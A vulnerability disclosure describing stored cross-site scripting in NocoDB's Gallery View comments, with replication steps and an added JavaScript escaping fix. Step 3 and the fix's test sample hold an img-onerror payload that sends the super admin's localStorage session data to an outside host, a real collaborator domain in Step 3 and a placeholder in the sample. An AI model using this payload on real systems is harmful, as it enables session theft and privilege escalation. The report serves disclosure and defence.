Stored Cross-Site Scripting in nocodb/nocodb
Jun 11th 2022
A stored cross-site scripting vulnerability exists within the Gallery View comments functionality.
Replication Steps and PoC
PC1. A project exists.
PC2. A table with a sheet containing data exists in the project.
PC3. A gallery view exists.
PC4. A user with the editor role exists.
Step 1: As an authenticated user with the editor role, navigate to the Gallery View for the existing table and sheet.
Step 2: In the new Gallery View, click on a card to edit the record.
Step 3: In a text field, supply a value containing the cross-site scripting payload, as follows:
"><img src onerror=fetch('http://dfw2bi08jn24w1j8ift9o1kd3490xp.oastify.com/'+localStorage.getItem('vuex'))>
Step 4: Click "Save row".
Step 5: In a new browser session, authenticate to NocoDB as the super admin.
Step 6: As the super admin, browse to the Gallery View, click the card from Step 2, and then click the icon to view the comments. The XSS is executed in the context of the super admin account.
Step 7: The local storage vuex data is sent to an attacker-controlled server, which can be base64 decoded to retrieve the session token.
The proof-of-concept video demonstrates a user with the editor role exploiting this vulnerability to gain super admin access.
A lower-privileged user (editor role) can achieve privilege escalation to super admin.
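The fix for this class of bug is to treat comment text as data, not markup. The following is an added mitigation example, not NocoDB's own code: a comment renderer that HTML-escapes user-supplied fields before they reach the DOM, exercised with a constructed copy of the Step 3 payload (the attacker host is a placeholder) to show that it ends up as inert text.

```javascript
// Added mitigation example (not NocoDB's code): escape user-controlled text
// before it is placed in HTML, so a stored payload like the one in Step 3 is
// displayed literally instead of creating an <img> element with an onerror
// handler when the super admin opens the comments panel.

// The five characters that can break out of text or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one comment. Both author and body are writable by an editor-role
// user, so both are escaped. The author also lands inside a quoted attribute,
// which is why '"' must be escaped and not only '<' and '>'.
function renderComment(comment) {
  const author = escapeHtml(comment.author);
  const body = escapeHtml(comment.body);
  return `<div class="comment"><span class="author" title="${author}">${author}</span><p>${body}</p></div>`;
}

// Structural fingerprint of rendered markup: how many tag openers and quotes
// it contains. With correct escaping, user input never changes these counts,
// because every '<' and '"' in the output comes from the template itself.
function markupFingerprint(html) {
  return {
    tags: (html.match(/<[a-zA-Z/]/g) || []).length,
    quotes: (html.match(/"/g) || []).length,
  };
}

// True when user-supplied fields introduced tags or quotes beyond the
// template baseline, i.e. escaping was bypassed or forgotten somewhere.
function userInputChangedStructure(comment) {
  const base = markupFingerprint(renderComment({ author: '', body: '' }));
  const got = markupFingerprint(renderComment(comment));
  return got.tags !== base.tags || got.quotes !== base.quotes;
}

// Constructed sample: the Step 3 payload as an editor would store it, with the
// collaborator domain replaced by a placeholder host.
const STORED_PAYLOAD =
  "\"><img src onerror=fetch('http://attacker.invalid/'+localStorage.getItem('vuex'))>";

const SAMPLE_COMMENT = { author: 'editor-user', body: STORED_PAYLOAD };
```

Rendering `SAMPLE_COMMENT` yields `&quot;&gt;&lt;img src onerror=...&gt;` inside the `<p>`, and `userInputChangedStructure(SAMPLE_COMMENT)` is false; a renderer that used `innerHTML` or `v-html` with the raw string would fail that check.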